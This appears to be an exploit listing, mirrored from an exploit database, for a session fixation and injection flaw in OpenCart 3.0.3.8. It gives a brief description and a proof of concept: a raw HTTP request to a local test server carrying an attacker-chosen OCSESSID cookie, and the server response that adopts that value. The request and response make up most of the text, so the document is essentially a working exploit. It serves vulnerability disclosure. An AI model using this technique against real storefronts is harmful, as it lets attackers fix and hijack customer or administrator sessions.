Exploit for Opencart 3.0.3.8 Session Injection

Name: Exploit for Opencart 3.0.3.8 Session Injection
Rating: 5 (431 reviews)
2021-11-29 | CVSS -0.2
## https://sploitus.com/exploit?id=PACKETSTORM:165090
# Exploit Title: opencart 3.0.3.8 - Sessjion Injection  
# Date: 28/11/2021  
# Exploit Author: Hubert Wojciechowski  
# Contact Author: snup.php@gmail.com  
# Company: https://redteam.pl  
# Vendor Homepage: https://www.opencart.com/  
# Software Link: https://www.opencart.com/  
# Version: 3.0.3.8  
# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23  
  
### Sessjion Fixation / injection  
  
Session cookie "OCSESSID" is inproperly processed  
Attacker can set any value cookie and server set this value   
Becouse of that sesssion injection and session fixation vulnerability  
  
-----------------------------------------------------------------------------------------------------------------------  
# POC  
-----------------------------------------------------------------------------------------------------------------------  
  
## Example  
  
Modify cookie "OCSESSID" value:  
-----------------------------------------------------------------------------------------------------------------------  
Req  
-----------------------------------------------------------------------------------------------------------------------  
  
GET /opencart-3.0.3.8/index.php?route=product/category&path=20_26 HTTP/1.1  
Host: 127.0.0.1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
Accept-Language: pl,en-US;q=0.7,en;q=0.3  
Accept-Encoding: gzip, deflate  
Connection: close  
Referer: http://127.0.0.1/opencart-3.0.3.8/  
Cookie: language=en-gb; currency=USD; user_uniq_agent=9c7cba4c3dd1b2f7ace2dd877a58051a25561a365a6631f0; USERSUB_TYPE=0; CMP_CREATED=2021-11-28+10%3A52%3A11; COMP_UID=8b0e7877a94c648807ef19006c68edf9; DEFAULT_PAGE=mydashboard; LISTVIEW_TYPE=comfort; TASKGROUPBY=duedate; TASK_TYPE_IN_DASHBOARD=10; CURRENT_FILTER=cases; DASHBOARD_ORDER=1_1%3A%3A1%2C2%2C3%2C5%2C6%2C8%2C9; CAKEPHP=ommpvclncs2t37j8tsep486ig5; OCSESSID=zxcvzxcvzxcvzxcvzxcvzxcv  
Upgrade-Insecure-Requests: 1  
Sec-Fetch-Dest: document  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Site: same-origin  
Sec-Fetch-User: ?1  
  
-----------------------------------------------------------------------------------------------------------------------  
Server set atttacker value:  
  
Res:  
-----------------------------------------------------------------------------------------------------------------------  
  
HTTP/1.1 200 OK  
Date: Sun, 28 Nov 2021 15:16:06 GMT  
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.11  
X-Powered-By: PHP/8.0.11  
Set-Cookie: OCSESSID=zxcvzxcvzxcvzxcvzxcvzxcv; path=/  
Connection: close  
Content-Type: text/html; charset=utf-8  
Content-Length: 18944  
[...]